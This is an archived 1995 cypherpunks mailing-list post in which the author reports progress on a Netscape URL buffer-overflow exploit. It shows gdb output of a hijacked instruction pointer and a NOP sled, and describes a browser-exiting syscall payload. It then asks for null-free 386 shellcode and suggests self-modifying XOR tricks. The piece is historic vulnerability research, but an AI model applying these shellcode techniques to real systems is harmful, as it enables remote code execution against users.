1995-09-27 - Status of Netscape Bug Exploit (suggestions needed)

Header Data

From: Ray Cromwell <rjc@clark.net>
To: cypherpunks@toad.com
Message Hash: df083b7c0a51deac933a672ee2db41ec0ec6c5f8eacd6f7cd4f8c96c0f04f483
Message ID: <199509270338.XAA09600@clark.net>
Reply To: N/A
UTC Datetime: 1995-09-27 03:38:18 UTC
Raw Date: Tue, 26 Sep 95 20:38:18 PDT

Raw message

From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 20:38:18 PDT
To: cypherpunks@toad.com
Subject: Status of Netscape Bug Exploit (suggestions needed)
Message-ID: <199509270338.XAA09600@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Ok Folks, here's what I got so far...


1) a URL that can place a specific value in the program counter

(gdb) select-frame 2
(gdb) info frame
Stack level 2, frame at 0xefbfbc30:
 eip = 0xefbfbc30; saved eip 0x90909090
 ^^^^^^^^^^^^^^^^
 called by frame at 0x90909090, caller of frame at 0xefbfbc14
 Arglist at 0xefbfbc30, args: 
 Locals at 0xefbfbc30, Previous frame's sp is 0xefbfbc1c
 Saved registers:
  eax at 0xefbfbc2c, ecx at 0xefbfbc28, edx at 0xefbfbc24, ebx at 0xefbfbc20,
  ebp at 0xefbfbc18, esi at 0xefbfbc14, edi at 0xefbfbc10, eip at 0xefbfbc0c,
  ps at 0xefbfbc08
 
2) A piece of exploit code on the stack near the PC

(gdb) disassemble 0xefbfbc10 0xefbfbc40
0xefbfbc27:     nop    
0xefbfbc28:     nop    
0xefbfbc29:     nop    
0xefbfbc2a:     nop
0xefbfbc2b:     nop    
0xefbfbc2c:     nop    
0xefbfbc2d:     nop    
0xefbfbc2e:     nop    
0xefbfbc2f:     nop    
0xefbfbc30:     nop    
0xefbfbc31:     nop    
0xefbfbc32:     nop    
0xefbfbc33:     nop    
0xefbfbc34:     nop    
0xefbfbc35:     nop    
0xefbfbc36:     nop    
0xefbfbc37:     nop    
0xefbfbc38:     nop    
0xefbfbc39:     nop    
0xefbfbc3a:     nop    
0xefbfbc3b:     nop    
0xefbfbc3c:     nop    
0xefbfbc3d:     nop    
0xefbfbc3e:     nop    
0xefbfbc3f:     nop    
0xefbfbc40:     nop    
 
3) exploit code that calls the kernel syscall() with SYS_exit
  (benign exploit, causes your browser to exit)

The problem? To make a syscall under BSDI2.0, I have to execute
an lcall 0x7,0x0 with 1,0 on the stack. However, to exploit the netscape
bug, you can not embed 0x0 in the URL. No problem I thought, I searched
Netscape's executable for any kernel calls, and found an lcall 0x7,0x0
at 0x257fee. But I can't do a 32-bit direct jump without a zero,
in the instruction (the 32-bit address is 0x00257fee), and I can't
do a relative jump from 0xefbfbc30+ 

If you can come up with some 386 assembly under BSDI2.0 which can
invoke syscall() in the kernel without any embeded 0x0 bytes
in the code, you can share a Hack Netscape T-Shirt with me.

If it turns out to be too hard under BSDI, I'll gladly assist
in producing exploits for Windows or another operating system.

One trick I thought up for embeding zeros in the code is to self-modify
the code using XOR ADDRESS,ADDRESS where ADDRESS is a byte on the stack
within the code.

Anyone have any better ones?

-Ray





Thread